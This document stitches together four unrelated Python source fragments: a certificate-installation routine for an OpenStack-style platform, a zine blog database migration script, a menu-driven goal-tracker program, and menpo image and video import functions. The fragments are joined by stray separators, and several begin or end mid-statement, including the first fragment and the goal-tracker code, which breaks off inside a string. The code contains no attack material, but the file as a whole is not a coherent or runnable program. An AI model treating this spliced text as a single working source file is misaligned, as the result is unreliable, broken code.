os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_ROOT_READ_ONLY),
'wb') as f:
f.write(private_bytes)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['openstack::keystone::endpoint::runtime',
'openstack::horizon::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
elif mode == constants.CERT_MODE_OPENSTACK_CA:
config_uuid = self._config_update_hosts(context, personalities)
file_content = public_bytes
config_dict = {
'personalities': personalities,
'file_names': [constants.OPENSTACK_CERT_CA_FILE],
'file_content': file_content,
'permissions': constants.CONFIG_FILE_PERMISSION_DEFAULT,
}
self._config_update_file(context, config_uuid, config_dict)
# copy the certificate to shared directory
with os.fdopen(os.open(constants.OPENSTACK_CERT_CA_FILE_SHARED,
os.O_CREAT | os.O_WRONLY,
constants.CONFIG_FILE_PERMISSION_DEFAULT),
'wb') as f:
f.write(file_content)
config_uuid = self._config_update_hosts(context, personalities)
config_dict = {
"personalities": personalities,
"classes": ['openstack::keystone::endpoint::runtime',
'openstack::horizon::runtime']
}
self._config_apply_runtime_manifest(context,
config_uuid,
config_dict)
else:
msg = "config_certificate unexpected mode=%s" % mode
LOG.warn(msg)
raise exception.SysinvException(_(msg))
return signature
def _config_selfsigned_certificate(self, context):
"""
This code is invoked when https is enabled
to install a self signed certificate to get started
:param context: an admin context.
"""
mode = constants.CERT_MODE_SSL
        passphrase = None
certificate_file = constants.SSL_PEM_SS_FILE
with open(certificate_file) as pemfile:
pem_contents = pemfile.read()
LOG.info("_config_selfsigned_certificate mode=%s file=%s" % (mode, certificate_file))
private_bytes, public_bytes, signature = \
self._extract_keys_from_pem(mode, pem_contents,
serialization.PrivateFormat.PKCS8,
passphrase)
personalities | |
# zine/upgrades/versions/001_split_tables.py (from the mitsuhiko/zine repository)
"""Switch to split tables for comments, posts and texts"""
from copy import deepcopy
from sqlalchemy.exceptions import ProgrammingError, OperationalError
from sqlalchemy.types import MutableType, TypeDecorator
from zine.upgrades.versions import *
metadata1 = db.MetaData()
metadata2 = db.MetaData()
# Also define ZEMLParserData here in case it changes. This way it won't break
# the change script
class ZEMLParserData(MutableType, TypeDecorator):
"""Holds parser data."""
impl = db.Binary
def process_bind_param(self, value, dialect):
if value is None:
return
from zine.utils.zeml import dump_parser_data
return dump_parser_data(value)
def process_result_value(self, value, dialect):
from zine.utils.zeml import load_parser_data
try:
return load_parser_data(value)
except ValueError: # Parser data invalid. Database corruption?
from zine.i18n import _
from zine.utils import log
log.exception(_(u'Error when loading parsed data from database. '
u'Maybe the database was manually edited and got '
u'corrupted? The system returned an empty value.'))
return {}
def copy_value(self, value):
return deepcopy(value)
users_old = db.Table('users', metadata1,
db.Column('user_id', db.Integer, primary_key=True),
db.Column('username', db.String(30)),
db.Column('real_name', db.String(180)),
db.Column('display_name', db.String(180)),
db.Column('description', db.Text),
db.Column('extra', db.PickleType),
db.Column('pw_hash', db.String(70)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('is_author', db.Boolean)
)
users_new = db.Table('users', metadata2,
db.Column('user_id', db.Integer, primary_key=True),
db.Column('username', db.String(30)),
db.Column('real_name', db.String(180)),
db.Column('display_name', db.String(180)),
db.Column('description', db.Text),
db.Column('extra', db.PickleType),
db.Column('pw_hash', db.String(70)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('is_author', db.Boolean)
)
texts = db.Table('texts', metadata2,
db.Column('text_id', db.Integer, primary_key=True),
db.Column('text', db.Text),
db.Column('parser_data', ZEMLParserData),
db.Column('extra', db.PickleType)
)
# See http://www.sqlalchemy.org/trac/ticket/1071
posts_new_seq = db.Sequence('posts_post_id_seq_migrate_script_001')
posts_new = db.Table('posts', metadata2,
db.Column('post_id', db.Integer, posts_new_seq, primary_key=True),
db.Column('pub_date', db.DateTime),
db.Column('last_update', db.DateTime),
db.Column('slug', db.String(200), index=True, nullable=False),
db.Column('uid', db.String(250)),
db.Column('title', db.String(150)),
db.Column('text_id', db.Integer, db.ForeignKey('texts.text_id')),
db.Column('author_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('comments_enabled', db.Boolean),
db.Column('comment_count', db.Integer, nullable=False, default=0),
db.Column('pings_enabled', db.Boolean),
db.Column('content_type', db.String(40), index=True),
db.Column('status', db.Integer),
)
posts_old = db.Table('posts', metadata1,
db.Column('post_id', db.Integer, primary_key=True),
db.Column('pub_date', db.DateTime),
db.Column('last_update', db.DateTime),
db.Column('slug', db.String(200), index=True, nullable=False),
db.Column('uid', db.String(250)),
db.Column('title', db.String(150)),
db.Column('text', db.Text),
db.Column('author_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('parser_data', db.ZEMLParserData),
db.Column('comments_enabled', db.Boolean),
db.Column('pings_enabled', db.Boolean),
db.Column('content_type', db.String(40), index=True),
db.Column('extra', db.PickleType),
db.Column('status', db.Integer)
)
comments_old = db.Table('comments', metadata1,
db.Column('comment_id', db.Integer, primary_key=True),
db.Column('post_id', db.Integer, db.ForeignKey('posts.post_id')),
db.Column('user_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('author', db.String(160)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('text', db.Text),
db.Column('is_pingback', db.Boolean, nullable=False),
db.Column('parser_data', db.ZEMLParserData),
db.Column('parent_id', db.Integer, db.ForeignKey('comments.comment_id')),
db.Column('pub_date', db.DateTime),
db.Column('blocked_msg', db.String(250)),
db.Column('submitter_ip', db.String(100)),
db.Column('status', db.Integer, nullable=False)
)
# See http://www.sqlalchemy.org/trac/ticket/1071
new_comments_seq = db.Sequence('comments_comment_id_seq_migrate_script_001')
comments_new = db.Table('comments', metadata2,
db.Column('comment_id', db.Integer, new_comments_seq, primary_key=True),
db.Column('post_id', db.Integer, db.ForeignKey('posts.post_id')),
db.Column('user_id', db.Integer, db.ForeignKey('users.user_id')),
db.Column('author', db.String(160)),
db.Column('email', db.String(250)),
db.Column('www', db.String(200)),
db.Column('text_id', db.Integer, db.ForeignKey('texts.text_id')),
db.Column('is_pingback', db.Boolean, nullable=False),
db.Column('parent_id', db.Integer, db.ForeignKey('comments.comment_id')),
db.Column('pub_date', db.DateTime),
db.Column('blocked_msg', db.String(250)),
db.Column('submitter_ip', db.String(100)),
db.Column('status', db.Integer, nullable=False)
)
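# The net schema change expressed above: the old text/parser_data columns on posts and
# comments move into the shared `texts` table, referenced via `text_id`. Illustrative
# join after the upgrade (assuming `db` re-exports SQLAlchemy's select, as the table
# definitions above suggest):
#
#   stmt = db.select([posts_new.c.title, texts.c.text],
#                    posts_new.c.text_id == texts.c.text_id)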
class PostOld(object):
post_id = None
def __init__(self, pub_date, last_update, slug, uid, title,
text, author_id, parser_data, comments_enabled, pings_enabled,
content_type, status, extra):
self.pub_date = pub_date
self.last_update = last_update
self.slug = slug
self.uid = uid
self.title = title
self.author_id = author_id
self.parser_data = parser_data
self.comments_enabled = comments_enabled
self.pings_enabled = pings_enabled
self.content_type = content_type
self.status = status
self.extra = extra
class PostNew(object):
post_id = text_id = None
def __init__(self, pub_date, last_update, slug, uid, title,
author_id, comments_enabled, comment_count, pings_enabled,
content_type, status):
self.pub_date = pub_date
self.last_update = last_update
self.slug = slug
self.uid = uid
self.title = title
self.author_id = author_id
self.comments_enabled = comments_enabled
self.comment_count = comment_count
self.pings_enabled = pings_enabled
self.content_type = content_type
self.status = status
class Text(object):
def __init__(self, text, parser_data, extra):
self.text = text
self.parser_data = parser_data
self.extra = extra
class CommentNew(object):
comment_id = None
def __init__(self, user_id, author, email, www, is_pingback, pub_date,
blocked_msg, submitter_ip, status):
self.user_id = user_id
self.author = author
self.email = email
self.www = www
self.is_pingback = is_pingback
self.pub_date = pub_date
self.blocked_msg = blocked_msg
self.submitter_ip = submitter_ip
self.status = status
class CommentOld(object):
comment_id = None
def __init__(self, user_id, author, email, www, text, is_pingback,
parser_data, pub_date, blocked_msg, submitter_ip,
status):
self.user_id = user_id
self.author = author
self.email = email
self.www = www
self.text = text
self.is_pingback = is_pingback
self.parser_data = parser_data
self.pub_date = pub_date
self.blocked_msg = blocked_msg
self.submitter_ip = submitter_ip
self.status = status
class User(object):
pass
def map_tables(mapper):
clear_mappers()
mapper(PostOld, posts_old, properties=dict(
comments = db.relation(
CommentOld, backref='post', lazy=False,
primaryjoin=posts_old.c.post_id == comments_old.c.post_id,
order_by=[db.asc(comments_old.c.comment_id),
db.asc(comments_old.c.parent_id)])
), order_by=db.asc(posts_old.c.post_id))
mapper(PostNew, posts_new, properties=dict(
t = db.relation(Text, backref="post", uselist=False, lazy=False),
comments = db.relation(
CommentNew, backref='post', lazy=False,
primaryjoin=posts_new.c.post_id == comments_new.c.post_id,
order_by=[db.asc(comments_new.c.comment_id),
db.asc(comments_new.c.parent_id)])
), order_by=db.asc(posts_new.c.post_id))
mapper(Text, texts)
mapper(User, users_old)
mapper(CommentOld, comments_old, order_by=db.asc(comments_old.c.comment_id),
properties=dict(
children = db.relation(
CommentOld,
primaryjoin=comments_old.c.parent_id == comments_old.c.comment_id,
order_by=[db.asc(comments_old.c.pub_date)],
backref=db.backref(
'parent', remote_side=[comments_old.c.comment_id],
primaryjoin=comments_old.c.parent_id == comments_old.c.comment_id
), lazy=True)
)
)
mapper(CommentNew, comments_new, properties=dict(
t = db.relation(Text, backref="comment", uselist=False, lazy=False),
children = db.relation(CommentNew,
primaryjoin=comments_new.c.parent_id == comments_new.c.comment_id,
order_by=[db.asc(comments_new.c.pub_date)],
backref=db.backref(
'parent', remote_side=[comments_new.c.comment_id],
primaryjoin=comments_new.c.parent_id == comments_new.c.comment_id
), lazy=True)
), order_by=db.asc(comments_new.c.comment_id)
)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine
# bind migrate_engine to your metadata
session = scoped_session(lambda: create_session(migrate_engine,
autoflush=True,
autocommit=False))
map_tables(session.mapper)
# Bind the engine
metadata1.bind = migrate_engine
metadata2.bind = migrate_engine
yield '<div class="message info">'
yield '<span class="progress">. </span>comment<br>\n'
yield '<span class="progress">+ </span>comment with parent_id<br>\n'
yield '<span class="progress">E </span>error handling comment<br>\n'
yield '</div>\n'
yield '<ul>'
yield ' <li>Auto-loading needed extra tables</li>\n'
post_links = db.Table('post_links', metadata2, autoload=True)
post_categories = db.Table('post_categories', metadata2, autoload=True)
post_tags = db.Table('post_tags', metadata2, autoload=True)
yield ' <li>Dropping old posts table indexes</li>\n'
for index in posts_old.indexes:
try:
index.drop(migrate_engine)
except (ProgrammingError, OperationalError):
# Index is on table definition but not on the database!? Weird
pass
yield ' <li>Dropping existing posts sequence if it exists</li>\n'
try:
posts_new_seq.drop(migrate_engine)
except Exception, err:
pass
yield ' <li>Dropping existing comments sequence if it exists</li>\n'
try:
new_comments_seq.drop(migrate_engine)
except Exception, err:
pass
yield ' <li>Querying for old posts from database</li>\n'
yield ' <li>Got %d posts</li>\n' % session.query(PostOld).count()
session.close()
yield ' <li>Create texts table</li>\n'
texts.create(migrate_engine)
yield ' <li>Renaming old posts table</li>\n'
posts_old.rename('posts_upgrade')
yield ' <li>Create new posts table</li>\n'
posts_new.create(migrate_engine)
yield ' <li>Renaming old comments table</li>\n'
comments_old.rename('comments_upgrade')
yield ' <li>Create new comments table</li>\n'
comments_new.create(migrate_engine)
yield ' <li>Migrate old posts into new table:</li>\n'
yield '<ul>'
for post in session.query(PostOld).all():
yield ' <li>%s</li>\n' % post.title
yield '<ul>'
new_post = PostNew(post.pub_date,
post.last_update,
post.slug,
post.uid,
post.title,
post.author_id,
post.comments_enabled,
len(post.comments),
post.pings_enabled,
post.content_type,
post.status)
yield ' <li>Create new text entry</li>\n'
new_post.t = Text(post.text, post.parser_data, post.extra)
session.add(new_post)
session.commit()
comments_count = len(post.comments)
n = (comments_count >= 100 and comments_count or 0)
yield ' <li>Migrating %d comments <span class="progress">' % \
comments_count
for comment in post.comments:
if n >= 100:
n = 0
yield '<br>\n '
parent_comment_new = None
if comment.parent_id:
parent_comment_old = session.query(CommentOld) \
.get(comment.parent_id)
parent_comment_new = session.query(CommentNew).filter(db.and_(
CommentNew.author==parent_comment_old.author,
CommentNew.pub_date==parent_comment_old.pub_date,
CommentNew.status==parent_comment_old.status,
CommentNew.submitter_ip==parent_comment_old.submitter_ip,
CommentNew.user_id==parent_comment_old.user_id,
CommentNew.www==parent_comment_old.www
)).first()
if not parent_comment_new:
yield 'E'
else:
yield '+'
else:
yield '.'
new_comment = CommentNew(
comment.user_id, comment.author, comment.email, comment.www,
comment.is_pingback,
comment.pub_date, comment.blocked_msg, comment.submitter_ip,
comment.status
)
new_comment.t = Text(comment.text, comment.parser_data, None)
new_comment.parent = parent_comment_new
new_post.comments.append(new_comment)
session.commit() # Need to commit every comment in order to
# later retrieve accurate parent_id's
n += 1
yield '</span></li>\n'
yield (' <li>Update linked tables <tt>post_categories</tt>, '
'<tt>post_links</tt> and <tt>post_tags</tt> for new '
'<tt>post_id</tt></li>\n')
migrate_engine.execute(post_categories.update(
whereclause=post_categories.c.post_id==post.post_id,
values={'post_id': new_post.post_id}))
migrate_engine.execute(post_links.update(
whereclause=post_links.c.post_id==post.post_id,
values={'post_id': new_post.post_id}))
migrate_engine.execute(post_tags.update(
whereclause=post_tags.c.post_id==post.post_id,
values={'post_id': new_post.post_id}))
yield '</ul>'
session.close()
yield '</ul>'
yield ' <li>Drop old comments table</li>\n'
drop_table(comments_old, migrate_engine)
yield ' <li>Drop old posts table</li>\n'
drop_table(posts_old, migrate_engine)
yield '</ul>'
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
session = scoped_session(lambda: create_session(migrate_engine,
autoflush=True,
autocommit=False))
map_tables(session.mapper)
# Bind the engine
metadata1.bind = migrate_engine
metadata2.bind = migrate_engine
yield '<div class="message info">'
yield '<span class="progress">. </span>comment<br>\n'
yield '<span class="progress">+ </span>comment with parent_id<br>\n'
yield '<span class="progress">E </span>error handling comment<br>\n'
yield '</div>\n'
yield '<ul>'
yield ' <li>Auto-loading needed extra tables</li>\n'
post_links = db.Table('post_links', metadata2, autoload=True)
post_categories = db.Table('post_categories', metadata2, autoload=True)
post_tags = db.Table('post_tags', metadata2, autoload=True)
yield ' <li>Dropping new posts table indexes</li>\n'
for index in posts_new.indexes:
try:
index.drop(migrate_engine)
except (ProgrammingError, OperationalError):
# Index is on table definition but not on the database!? Weird
pass
yield ' <li>Querying new posts from database</li>\n'
yield ' <li>Got %d posts</li>\n' % session.query(PostNew).count()
session.close()
yield ' <li>Renaming new posts table</li>\n'
posts_new.rename('posts_downgrade')
yield ' <li>Create old posts table</li>\n'
posts_old.create(migrate_engine)
yield ' <li>Renaming new comments table</li>\n'
comments_new.rename('comments_downgrade')
yield ' <li>Create old comments table</li>\n'
comments_old.create(migrate_engine)
yield ' <li>Migrate new posts into old table:</li>\n'
yield '<ul>'
for post in session.query(PostNew).all():
yield ' <li>%s</li>\n' % post.title
yield '<ul>'
old_post = PostOld(post.pub_date,
post.last_update,
post.slug,
post.uid,
post.title,
post.t.text,
post.author_id,
post.t.parser_data,
post.comments_enabled,
post.pings_enabled,
post.content_type,
post.status,
post.t.extra)
session.add(old_post)
session.commit()
comments_count = len(post.comments)
n = comments_count >= 100 and comments_count or 0
yield ' <li>Migrating %d comments <span class="progress">' % \
comments_count
for comment in post.comments:
if n >= 100:
n = 0
yield '<br>\n '
parent_comment_old = None
if comment.parent_id:
parent_comment_new = session.query(CommentNew) \
.get(comment.parent_id)
parent_comment_old = session.query(CommentOld).filter(db.and_(
CommentOld.author==parent_comment_new.author,
CommentOld.pub_date==parent_comment_new.pub_date,
CommentOld.status==parent_comment_new.status,
CommentOld.submitter_ip==parent_comment_new.submitter_ip,
CommentOld.user_id==parent_comment_new.user_id,
CommentOld.www==parent_comment_new.www
)).first()
if not parent_comment_old:
yield 'E'
else:
| |
# from the vladosstrawberry/aim_tracker repository
import json
class App:
main_names = dict()
def __init__(self, file):
self.file = file
try:
with open(file, 'r') as f:
self.main_names = json.load(f)
except OSError:
print("No such file, will do a new one")
f = open(file, 'w+')
f.close()
print("Initialized")
def run(self):
run = True
while run:
print("1. Print all aims") # display_aims()
print("1. Print Special Aim") # display_aims(aim)
print("1. Print Special SubAim of Aim") # display_aims(aim, sub)
print("1. Print Special Task of SubAim of Aim") # display_aims(aim, sub, task)
print("1. Print non completed Tasks")
print("2. Delete Aim")
print("2. Delete Aim's SubAim")
print("2. Delete Aim's SubAim's Task")
print("3. Add an Aim") # add_aim()
print("3. Add a SubAim") # add_sub_aim()
print("3 Add a task") # add_task()
print("4. Change an Aim")
print("4. Change a SubAim of Aim")
print("4. Change a task of SubAim of Aim") # change_task()
print("4. Change a value of SubAm of Aim") # change_task_value()
print("4. Change step by step") # change_step_by_step()
print("4. Change by concrete path") # change_by_concrete_path()
print("5. exit")
answer = int(input())
if answer == 1:
self.display_print_menu()
if answer == 2:
self.display_delete_menu()
if answer == 3:
self.display_add_menu()
if answer == 4:
self.display_change_menu()
if answer == 5:
run = False
def display_print_menu(self):
run = True
while run:
print("1. Print all aims") # display_aims()
print("2. Print Special Aim") # display_aims(aim)
print("3. Print Special SubAim of Aim") # display_aims(aim, sub)
print("4. Print Special Task of SubAim of Aim") # display_aims(aim, sub, task)
print("5. Print non completed Tasks")
print("6. Go back")
answer = int(input())
if answer == 1:
self.display_aims()
elif answer == 2:
self.display_aims(main="get")
elif answer == 3:
self.display_aims(main="get", sub_aim="get")
elif answer == 4:
self.display_aims(main="get", sub_aim="get", task="get")
elif answer == 5:
self.display_list_to_do()
elif answer == 6:
run = False
else:
print("Enter a digit in range 1-4")
def display_change_menu(self):
run = True
while run:
print("How do you want to change everything?")
print("1. Change an Aim") # change_aim_name()
print("2. Change a SubAim of Aim") # change_sub_aim_name()
print("3. Change a task of SubAim of Aim") # change_task()
print("3. Change a value of SubAm of Aim") # change_task_value()
print("3. Change step by step") # change_step_by_step()
print("3. Change by concrete path") # change_by_concrete_path()
print("4. Go back")
print("Enter in in format: 'main_aim sub_aim task'")
print("if you don't know the task or sub_aim, fill it with None")
answer = int(input("Answer: "))
if answer == 1:
self.change_aim_name()
elif answer == 2:
self.change_sub_aim_name()
elif answer == 3:
print("1. Step by step")
print("2. by path 'main sub task'")
print("else go back")
answer_to_four = int(input())
if answer_to_four == 1:
self.change_step_by_step()
elif answer_to_four == 2:
self.change_by_concrete_path()
elif answer == 4:
run = False
def display_add_menu(self):
run = True
while run:
print("1. Add an Aim")
print("2. Add a SubAim")
print("3. Add a task")
print("4. Exit")
answer = int(input())
if answer == 1:
self.add_aim()
elif answer == 2:
self.add_sub_aim()
elif answer == 3:
self.add_task()
elif answer == 4:
run = False
else:
print("Enter a digit in range 1-4")
def display_delete_menu(self):
run = True
while run:
print("1. Delete Aim")
print("2. Delete Aim's SubAim")
print("3. Delete Aim's SubAim's Task")
print("4. Exit")
answer = int(input())
if answer == 1:
self.delete_aim()
elif answer == 2:
self.delete_sub_aim()
elif answer == 3:
self.delete_task()
elif answer == 4:
run = False
else:
print("Enter a digit in range 1-4")
def add_aim(self):
aim_to_add = input("Enter an aim name: ")
if aim_to_add not in self.main_names:
self.main_names.update({aim_to_add: {}})
self.save()
else:
print("Main Aim " + aim_to_add + " already exists")
def add_sub_aim(self, main_aim=None):
if main_aim is None:
main_aim = self.get_main_aim()
sub_aim_to_add = input("Enter a sub_aim name: ")
if sub_aim_to_add not in self.main_names[main_aim]:
self.main_names[main_aim].update({sub_aim_to_add: {}})
self.save()
else:
print("Sub Aim " + sub_aim_to_add + " already exists")
def add_task(self, main_aim=None, sub_aim=None):
if main_aim == "None" or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if sub_aim == "None" or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
task_to_add = input("Enter a task to add")
if task_to_add not in self.main_names[main_aim][sub_aim]:
self.main_names[main_aim][sub_aim].update({task_to_add: "New"})
self.save()
else:
print("Task " + task_to_add + " already exists")
def change_aim_name(self, main_aim=None):
        if main_aim is None or main_aim not in self.main_names:
main_aim = self.get_main_aim()
new_main_aim = input("Enter new text")
if new_main_aim not in self.main_names or new_main_aim == main_aim:
new_args = self.main_names[main_aim]
self.delete_aim(main_aim)
self.main_names.update({new_main_aim : new_args})
self.save()
else:
print("Such aim exists")
def change_sub_aim_name(self, main_aim=None, sub_aim=None):
        if main_aim is None or main_aim not in self.main_names:
main_aim = self.get_main_aim()
if len(self.main_names[main_aim]) == 0:
print("Main aim - " + main_aim + " is empty, add new subaims.")
return
if sub_aim is None or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
new_sub_aim = input("Enter new text")
if new_sub_aim not in self.main_names[main_aim] or new_sub_aim == sub_aim:
new_args = self.main_names[main_aim][sub_aim]
self.delete_sub_aim(main_aim,sub_aim)
            self.main_names[main_aim].update({new_sub_aim: new_args})
self.save()
else:
print("Such aim exists")
def change_step_by_step(self):
main_aim = self.get_main_aim()
if not len(self.main_names[main_aim]) == 0:
sub_aim = self.get_sub_aim(main_aim)
if not len(self.main_names[main_aim][sub_aim]) == 0:
task = self.get_task(main_aim, sub_aim)
self.work_with_task(main_aim, sub_aim, task)
else:
print("No tasks here")
else:
print("No sub aims here")
def change_by_concrete_path(self, parameter=None):
        if parameter is None:
parameter = input("Enter the path")
main_aim, sub_aim, task = parameter.split(" ")
if main_aim == "None" or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if not len(self.main_names[main_aim]) == 0:
if sub_aim == "None" or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
if not len(self.main_names[main_aim][sub_aim]) == 0:
if task == "None" or (task not in self.main_names[main_aim][sub_aim]):
task = self.get_task(main_aim, sub_aim)
print("Working with MAIN AIM - " + main_aim)
print("Working with SUB AIM - " + sub_aim)
print("Working with TASK - " + task + " its value: " + self.main_names[main_aim][sub_aim][task])
self.work_with_task(main_aim, sub_aim, task)
def change_task_state(self, main_aim, sub_aim, task):
print("Change - " + main_aim + " " + sub_aim + " " + task)
self.main_names[main_aim][sub_aim][task] = input("Enter smth to change the value: ")
self.save()
def change_task(self, main_aim, sub_aim, task):
self.main_names[main_aim][sub_aim].pop(task)
self.task_names.pop(task)
task = input("Enter new task: ")
self.main_names[main_aim][sub_aim].update({task: "Incompleted"})
self.task_names.update({task: "Incompleted"})
print("New task " + task + " " + "Incompleted")
self.save()
def get_main_aim(self):
to_return = ""
run = True
for item in self.main_names:
print(item)
while run:
to_return = input("Enter a main_aim to edit ")
if to_return in self.main_names:
run = False
else:
print("Enter a valid main_aim")
return to_return
def get_sub_aim(self, main_aim):
to_return = ""
run = True
self.display_sub_aims(main_aim)
while run:
to_return = input("Enter a sub_aim to edit ")
if to_return in self.main_names[main_aim]:
run = False
else:
print("Enter a valid sub_aim")
return to_return
def get_task(self, main_aim, sub_aim):
to_return = ""
run = True
while run:
self.display_aims(main_aim, sub_aim)
to_return = input("Enter a task to edit")
if to_return in self.main_names[main_aim][sub_aim]:
run = False
else:
print("Enter a valid task")
return to_return
def work_with_task(self, main_aim, sub_aim, task):
run = True
while run:
            decision = int(input("\n1. to change a state."
                                 "\n2. to change the task name."
                                 "\n3. print"
                                 "\n4. exit"))
            if decision == 1:
                self.change_task_state(main_aim, sub_aim, task)
            elif decision == 2:
                self.change_task(main_aim, sub_aim, task)
            elif decision == 3:
                print("Task - " + task + " value: " + self.main_names[main_aim][sub_aim][task])
                break
            elif decision == 4:
print("Exit")
run = False
else:
print("Enter a valid number")
def delete_task(self, main_aim=None, sub_aim=None, task=None):
if main_aim is None or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if sub_aim is None or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
if task is None or (task not in self.main_names[main_aim][sub_aim]):
task = self.get_task(main_aim, sub_aim)
answer = input("Do you really want to delete task: " + task + "\n If yew - print y else n")
if answer.lower() == 'y':
self.main_names[main_aim][sub_aim].pop(task)
self.save()
print("Deleted")
else:
print("Terminated")
def delete_sub_aim(self, main_aim=None, sub_aim=None):
if main_aim is None or (main_aim not in self.main_names):
main_aim = self.get_main_aim()
if sub_aim is None or (sub_aim not in self.main_names[main_aim]):
sub_aim = self.get_sub_aim(main_aim)
answer = input("Do you really want to delete sub_aim: " + sub_aim + "\n If yes - print Y else N")
if answer.lower() == 'y':
self.main_names[main_aim].pop(sub_aim)
self.save()
print("Deleted")
else:
print("Terminated")
def delete_aim(self, main_aim=None):
if main_aim is None or main_aim not in self.main_names:
main_aim = self.get_main_aim()
answer = input("Do you really want to delete main_aim: " + main_aim + "\n If yes - | |
from functools import partial
from collections import Sequence
import os
from pathlib import Path
import random
from ..utils import _norm_path
from menpo.base import menpo_src_dir_path, LazyList
from menpo.visualize import print_progress
def data_dir_path():
r"""A path to the Menpo built in ./data folder on this machine.
Returns
-------
``pathlib.Path``
The path to the local Menpo ./data folder
"""
return menpo_src_dir_path() / 'data'
def data_path_to(asset_filename):
r"""
The path to a builtin asset in the ./data folder on this machine.
Parameters
----------
asset_filename : `str`
The filename (with extension) of a file builtin to Menpo. The full
set of allowed names is given by :func:`ls_builtin_assets()`
Returns
-------
data_path : `pathlib.Path`
The path to a given asset in the ./data folder
Raises
------
ValueError
If the asset_filename doesn't exist in the `data` folder.
"""
asset_path = data_dir_path() / asset_filename
if not asset_path.is_file():
raise ValueError("{} is not a builtin asset: {}".format(
asset_filename, ls_builtin_assets()))
return asset_path
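# Usage sketch (the asset name is an example; any name listed by ls_builtin_assets()
# is valid):
#
#   >>> data_path_to('einstein.jpg')
#   PosixPath('/path/to/menpo/data/einstein.jpg')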
def same_name(path):
r"""
Menpo's default image landmark resolver. Returns all landmarks found to have
the same stem as the asset.
"""
# pattern finding all landmarks with the same stem
pattern = path.with_suffix('.*')
# find all the landmarks we can with this name. Key is ext (without '.')
return {p.suffix[1:].upper(): p for p in landmark_file_paths(pattern)}
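# For example, given '/faces/face.png' with '/faces/face.pts' and '/faces/face.ljson'
# alongside it (hypothetical paths), same_name would return a dict keyed by the
# upper-cased extension:
#
#   {'PTS': PosixPath('/faces/face.pts'), 'LJSON': PosixPath('/faces/face.ljson')}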
def same_name_video(path, frame_number):
r"""
Menpo's default video landmark resolver. Returns all landmarks found to have
the same stem as the asset.
"""
# pattern finding all landmarks with the same stem
pattern = path.with_name('{}_{}.*'.format(path.stem, frame_number))
# find all the landmarks we can with this name. Key is ext (without '.')
return {p.suffix[1:].upper(): p for p in landmark_file_paths(pattern)}
def import_image(filepath, landmark_resolver=same_name, normalise=True):
r"""Single image (and associated landmarks) importer.
If an image file is found at `filepath`, returns an :map:`Image` or
subclass representing it. By default, landmark files sharing the same
filename stem will be imported and attached with a group name based on the
extension of the landmark file, although this behavior can be customised
(see `landmark_resolver`). If the image defines a mask, this mask will be
imported.
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to an image file.
landmark_resolver : `function`, optional
This function will be used to find landmarks for the
image. The function should take one argument (the path to the image) and
return a dictionary of the form ``{'group_name': 'landmark_filepath'}``
Default finds landmarks with the same name as the image file.
normalise : `bool`, optional
If ``True``, normalise the image pixels between 0 and 1 and convert
to floating point. If false, the native datatype of the image will be
maintained (commonly `uint8`). Note that in general Menpo assumes
:map:`Image` instances contain floating point data - if you disable
this flag you will have to manually convert the images you import to
floating point before doing most Menpo operations. This however can be
useful to save on memory usage if you only wish to view or crop images.
Returns
-------
images : :map:`Image` or list of
An instantiated :map:`Image` or subclass thereof or a list of images.
"""
kwargs = {'normalise': normalise}
return _import(filepath, image_types,
landmark_ext_map=image_landmark_types,
landmark_resolver=landmark_resolver,
landmark_attach_func=_import_object_attach_landmarks,
importer_kwargs=kwargs)
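# Minimal usage sketch (hypothetical paths):
#
#   img = import_image('/data/faces/face_001.png')
#   # any '/data/faces/face_001.*' landmark file found by same_name is attached,
#   # e.g. accessible as img.landmarks['PTS']
#   raw = import_image('/data/faces/face_001.png', normalise=False)  # keeps uint8 pixels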
def import_video(filepath, landmark_resolver=same_name_video, normalise=True,
importer_method='ffmpeg'):
r"""Single video (and associated landmarks) importer.
If a video file is found at `filepath`, returns an :map:`LazyList` wrapping
all the frames of the video. By default, landmark files sharing the same
filename stem will be imported and attached with a group name based on the
extension of the landmark file appended with the frame number, although this
behavior can be customised (see `landmark_resolver`).
Parameters
----------
filepath : `pathlib.Path` or `str`
A relative or absolute filepath to a video file.
landmark_resolver : `function`, optional
This function will be used to find landmarks for the
video. The function should take two arguments (the path to the video and
the frame number) and return a dictionary of the form ``{'group_name':
'landmark_filepath'}`` Default finds landmarks with the same name as the
video file, appended with '_{frame_number}'.
normalise : `bool`, optional
If ``True``, normalise the frame pixels between 0 and 1 and convert
to floating point. If ``False``, the native datatype of the image will
be maintained (commonly `uint8`). Note that in general Menpo assumes
:map:`Image` instances contain floating point data - if you disable this
    flag you will have to manually convert the frames you import to floating
point before doing most Menpo operations. This however can be useful to
save on memory usage if you only wish to view or crop the frames.
importer_method : {'ffmpeg', 'avconv'}, optional
A string representing the type of importer to use, by default ffmpeg
is used.
Returns
-------
frames : :map:`LazyList`
An lazy list of :map:`Image` or subclass thereof which wraps the frames
of the video. This list can be treated as a normal list, but the frame
is only read when the video is indexed or iterated.
"""
kwargs = {'normalise': normalise}
video_importer_methods = {'ffmpeg': ffmpeg_video_types}
if importer_method not in video_importer_methods:
raise ValueError('Unsupported importer method requested. Valid values '
'are: {}'.format(video_importer_methods.keys()))
return _import(filepath, video_importer_methods[importer_method],
landmark_ext_map=image_landmark_types,
landmark_resolver=landmark_resolver,
landmark_attach_func=_import_lazylist_attach_landmarks,
importer_kwargs=kwargs)
